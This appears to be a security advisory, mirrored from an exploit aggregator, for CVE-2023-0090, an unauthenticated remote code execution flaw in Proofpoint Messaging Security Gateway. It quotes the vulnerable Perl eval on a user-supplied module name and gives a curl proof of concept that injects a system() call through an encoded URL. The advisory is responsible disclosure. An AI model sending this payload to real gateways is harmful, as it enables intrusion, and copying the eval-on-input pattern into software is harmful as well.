Share
## https://sploitus.com/exploit?id=EC957A6A-B1E7-581E-BE9C-C13C95F284CD
# About

Security researcher: ly1g3, ly1g3[at]tuta.io

GPG fingerprint: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586


Overview: Remote Code Execution - Unauthenticated RCE

CVE: CVE-2023-0090

Timeline:
* Discovered - ly1g3
* Reported - ly1g3
* Fixed - Proofpoint

# Proofpoint Messaging Security Gateway 8.18.4.73-8.18.4.73 
Exploits for Proofpoint Messaging Security Gateway

## Remote Code Execution (RCE)
With access to the WebServices API unauthenticated RCE with admin privileges can be achieved.


## Technical
`Webservices.pm` does not sanitize or check user input. No authentication is required to reach the function but API access must be enable in settings to be able to do RCE. `$module` comes directly from user data and is evaluated.

```perl

my $module = (split(/\//,$uri))[1];
$module = SERVICE_MODULE_PREFIX() . "::\u$module";

...


eval("require $module");
```



## POC
Will create file called `abc` in `/tmp/`. Code run as `pps` user.
```bash
curl -k -vv "https://192.168.80.80:10010/ws/abc%2bsystem(%60id%20>%20\\\$\{SHELL:0:1\}tmp\\\$\{SHELL:0:1\}abc%60)"
```